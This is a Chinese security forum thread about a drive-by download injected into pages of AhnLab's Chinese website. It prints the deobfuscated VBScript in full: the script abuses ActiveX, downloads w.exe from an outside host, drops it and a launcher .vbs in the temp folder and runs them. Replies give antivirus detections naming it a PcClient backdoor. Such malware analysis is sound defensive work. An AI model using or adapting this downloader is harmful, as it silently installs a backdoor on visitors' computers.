安博士部分页面被挂

jimmyleo

jdyxh.ahn.com.cn

解出

1. 
   
2. <script language=VBScript>
   
3. On Error Resume Next
   
4. cuteqq = "http://tangyong.go.51.net/w.exe"
   
5. Set cuteqq2 = document.createElement("object")
   
6. cuteqqid="clsid:"
   
7. cuteqqidx="BD96"
   
8. cuteqqid2="C556-65"
   
9. cuteqqid3="A3-11D"
   
10. cuteqqid4="0-98"
    
11. cuteqqid5="3A-00C"
    
12. cuteqqid6="04FC"
    
13. cuteqqid7="29E36"
    
14. cuteqq3="Microsoft.X"
    
15. cuteqq4="MLHTTp"
    
16. cuteqq2.SetAttribute "classid", cuteqqid&cuteqqidx&cuteqqid2&cuteqqid3&cuteqqid4&cuteqqid5&cuteqqid6&cuteqqid7
    
17. cuteqq5=cuteqq3&cuteqq4
    
18. Set lovecuteqq = cuteqq2.CreateObject(cuteqq5,"")
    
19. lovecuteqq.Open "GET", cuteqq, False
    
20. lovecuteqq.Send
    
21. Cuteqq_784378237="MicroSofts.pif"
    
22. Cuteqq_784378237s="MicroSofts.vbs"
    
23. Q784378237="Scripting."
    
24. Q784378237s="FileSyst"
    
25. Q784378237ss="emObject"
    
26. Q784378237sss="Adod"
    
27. Q784378237ssss="b.stream"
    
28. Q784378237sssss=Q784378237sss&Q784378237ssss
    
29. Set chilam = cuteqq2.createobject(Q784378237&Q784378237s&Q784378237ss,"")
    
30. Set yingying = chilam.GetSpecialFolder(2)
    
31. Cuteqq_784378237=chilam.BuildPath(yingying,Cuteqq_784378237)
    
32. Cuteqq_784378237s=chilam.BuildPath(yingying,Cuteqq_784378237s)
    
33. Set chilams = cuteqq2.createobject(Q784378237sssss,"")
    
34. chilams.type=1
    
35. chilams.Open
    
36. chilams.Write lovecuteqq.ResponseBody
    
37. chilams.Savetofile Cuteqq_784378237,2
    
38. chilams.Close
    
39. chilams.Type=2
    
40. chilams.Open
    
41. chilams.WriteText  "Set Lovecuteqq = CreateObject(""Wscript.Shell"")"&vbCrLf&"Lovecuteqq.run ("""&Cuteqq_784378237&""")"
    
42. chilams.Savetofile Cuteqq_784378237s,2
    
43. chilams.Close
    
44. cute="Shell.Applica"
    
45. qq="tion"
    
46. Set cute_qq = cuteqq2.createobject(cute&qq,"")
    
47. Qq784378237="O"
    
48. Qq784378237s="p"
    
49. Qq784378237ss="e"
    
50. Qq784378237sss="n"
    
51. cute_qq.SHelLExeCuTe Cuteqq_784378237s,"","",Qq784378237&Qq784378237s&Qq784378237ss&Qq784378237sss,0
    
52. </script>
    
53. <script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
    
54. <body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
    

复制代码

hxxp://tangyong.go.51.net/w.exe

avira乱报 linkscanner索性没报...

spaceplane

BD 飘

spaceplane

E:\pic\_PICtemp\w.rar >>RAR >>w.exe - 可能是 Win32/PcClient 木马 的一个变种

promised

C:\ABC\2\w.exe - 特征码 'Backdoor.Win32.PcClient.yw' 被发现

醉一生爱妍

   

哎，做个报告吧

。。。。。。。。。

对EQSBIE还不是很熟悉

我说怎么没日志。。。。。。。。。

[ 本帖最后由 garyyan456 于 2008-3-14 19:17 编辑 ]

jimmyleo

你去看了 就知道蛮有聊的

solcroft

Sign of "Win32:Agent-EPC [Trj]" has been found in "http://tangyong.go.51.net/w.exe" file.

深红的雪

安博士难道想效仿东方卫士

qigang

rising20.35.41未杀。

jimmyleo

安博士 是 来自 韩国的朋友
进入国内了解到了 东方卫士这个兄弟...